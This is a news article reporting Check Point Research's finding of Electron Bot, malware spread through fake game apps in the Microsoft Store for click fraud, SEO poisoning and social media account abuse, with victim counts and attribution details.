They detect new malware capable of controlling social network accounts

Check Point Research (CPR), the Threat Intelligence division of Check Point® Software Technologies Ltd. (NASDAQ: CHKP), a leading provider of global cybersecurity solutions, has detected the existence of new malware that is being actively distributed through from the official Microsoft store, nicknamed Electron Bot.

With more than 5,000 computers already affected, the malware continually executes cybercriminal commands, such as taking over social media accounts on Facebook, Google, and Sound Cloud. In this way, you are able to register new accounts, log in, leave comments and like other posts.

Electron Bot is a modular SEO poisoning malware, used for social media promotion and click fraud. It is mainly distributed through the Microsoft Store platform and appears from dozens of infected applications, mostly video games, which are constantly uploaded by cybercriminals. The attackers’ activity began as an ad clicker campaign discovered in late 2018. The malware in question was hiding in the Microsoft Store as an app called “Album by Google Photos” that claimed to be published by Google LLC. Now it has steadily evolved over the years, adding new features and techniques to its arsenal.

The bot is built using Electron, a framework for creating cross-platform desktop applications using web scripts. The framework combines the Chromium rendering engine and the Node.js runtime, giving it the capabilities of a script-driven browser like JavaScript.

To avoid detection, most malware control scripts are dynamically loaded at runtime from cybercriminals’ servers. This allows them to modify the malware payload and change the behavior of the bots at any time. Electron mimics human browsing behavior and evades website protections.

The main capabilities of Electron bot are:

1. SEO poisoning, an attack method in which cybercriminals create malicious websites and use search engine optimization tactics to make them appear prominently in search results. This method is also used to sell as a service and promote the ranking of other websites.
2. ad clickera computer infection that runs in the background and constantly connects to remote web pages to generate advertising “clicks”, thereby earning money for the number of times an ad is clicked.
3. Promote social media accountssuch as YouTube and SoundCloud, to drive traffic to specific content and increase visits and clicks on ads to generate profits.
4. Promote products online to generate revenue from clicks on ads or increase the rating of the store in order to increase sales.

Also, as the Electron Bot payload is done dynamically, attackers can use the installed malware as a backdoor to gain full control of the victim’s device.

– SEO poisoning, an attack method in which cybercriminals create malicious websites and use search engine optimization tactics to make them appear prominently in search results. This method is also used to sell as a service and promote the ranking of other websites.

– Ad Clicker, a computer infection that runs in the background and constantly connects to remote web pages to generate “clicks” on advertisements, thereby monetizing the number of times an ad is clicked .

– Promote social media accounts, such as YouTube and SoundCloud, to drive traffic to specific content and increase visits and clicks on ads to generate profits.

– Promote products online to generate revenue from clicks on ads or increase the rating of the store with the aim of increasing sales.

Also, as the Electron Bot payload is done dynamically, attackers can use the installed malware as a backdoor to gain full control of the victim’s device.

Distribution through video game applications in the Microsoft Store

There are dozens of infected apps in the Microsoft store. Popular titles like “Temple Run” or “Subway Surfer” have been found to be malicious.

So far, investigators have counted 5,000 victims in 20 countries. Most of the victims are from Sweden, Bermuda, Israel and Spain. In addition, they have detected several malicious video game distributors, where all the applications under them are related to the malicious campaign:

• Lupy games
• crazy 4 games
• Jeuxjeuxkeux games
• Akshi games
• Goo Games
• Bizon case

how malware works

1. The cyberattack begins with the installation of an app from the Microsoft Store that is posing as legitimate.
2. After installation, the cyber criminal downloads files and executes scripts.
3. The malware, which has been downloaded, gains persistence on the victim’s computer, repeatedly executing various commands sent from the attacker’s C&C.

As for the origin of this cyberattack, there is evidence that the malware campaign started in Bulgaria, including:

• All variants between 2019 – 2022 were uploaded to a public cloud storage “mediafire.com” from Bulgaria.
• The Sound Cloud account and the YouTube channel that the bot promotes are under the name of “Ivaylo Yordanov”, a popular Bulgarian soccer fighter.
• Bulgaria is the most promoted country in the source code.

Researchers at Check Point Research have informed Microsoft of all detected video game distributors that are associated with this campaign.
“This investigation has analyzed a new malware called Electron-Bot that has attacked more than 5,000 victims worldwide. Electron-Bot is easily downloaded and spread from the official Microsoft Store platform. The Electron framework provides Electron applications with access to all computing resources, including GPU computing. Since the bot’s payload is dynamically loaded at each runtime, attackers can modify the code and change the bot’s behavior at high risk. For example, they can initiate another second stage and deliver new malware such as ransomware or a RAT. All this can happen without the knowledge of the victim. Most people think that app store reviews can be trusted, and don’t hesitate to download an app from there. This carries incredible risk, as you never know what malicious items you may be downloading.”warns Eusebio Nieva, technical director of Check Point Software for Spain and Portugal.